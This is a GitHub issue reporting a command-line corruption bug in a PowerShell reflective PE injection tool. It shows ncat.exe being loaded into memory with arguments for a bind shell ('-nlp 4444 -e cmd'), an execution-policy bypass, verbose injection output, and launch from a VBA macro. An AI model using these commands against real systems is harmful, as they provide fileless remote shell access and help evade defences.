You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
{{ message }}
This repository has been archived by the owner on Jan 21, 2021. It is now read-only.
I'd like to report an issue with the code handling buffer jugglings around process' command line.
When the Powershell get's executed with some of it's inner arguments, like powershell -ep bypass - the joined process' own command line and this produced from parsing -ExeArgs leads to undefined behaviour and corrupted command line.
Here's the example:
Start up the Powershell interpreter like so: powershell -ep bypass
We are invoking Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "-nlp 4444 -e cmd"
The PE image being injected is classic ncat.exe coming straight from the nmap.org.
The resulted verbose output becomes:
PS C:\Users\IEUser\Desktop> .\decoded.ps1
VERBOSE: PowerShell ProcessID: 6076
VERBOSE: Calling Invoke-MemoryLoadLibrary
VERBOSE: Getting basic PE information from the file
VERBOSE: Allocating memory for the PE and write its headers to memory
VERBOSE: Getting detailed PE information from the headers loaded in memory
VERBOSE: StartAddress: 0x0AAC0000 EndAddress: 0x0AB2D000
VERBOSE: Copy PE sections in to memory
VERBOSE: Update memory addresses based on where the PE was actually loaded in memory
VERBOSE: Import DLL's needed by the PE we are loading
VERBOSE: Done importing DLL imports
VERBOSE: Update memory protection flags
VERBOSE: Call EXE Main function. Address: 0x0AB04C04. Creating thread for the EXE to run in.
Ncat: Could not resolve hostname "bypass": The requested name is valid, but no data of the requested type was found. . QUITTING.
VERBOSE: EXE thread has completed.
VERBOSE: Done!
PS C:\Users\IEUser\Desktop>
Now, one can clearly observe that ncat complains about inability to resolve bypass host. This must be an issue with appended EXE args to original process' command line, or the fact that original process command line has not been previously zeroed-out, or something.
Hello there,
I'd like to report an issue with the code handling buffer jugglings around process' command line.
When the Powershell get's executed with some of it's inner arguments, like
powershell -ep bypass
- the joined process' own command line and this produced from parsing-ExeArgs
leads to undefined behaviour and corrupted command line.Here's the example:
powershell -ep bypass
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "-nlp 4444 -e cmd"
ncat.exe
coming straight from the nmap.org.Now, one can clearly observe that
ncat
complains about inability to resolvebypass
host. This must be an issue with appended EXE args to original process' command line, or the fact that original process command line has not been previously zeroed-out, or something.The exact invocation is kinda like:
The same behaviour goes for other invocations like from VBA Macro code leveraging
Shell(" [...] powershell -ep bypass -file decoded.ps1")
.The text was updated successfully, but these errors were encountered: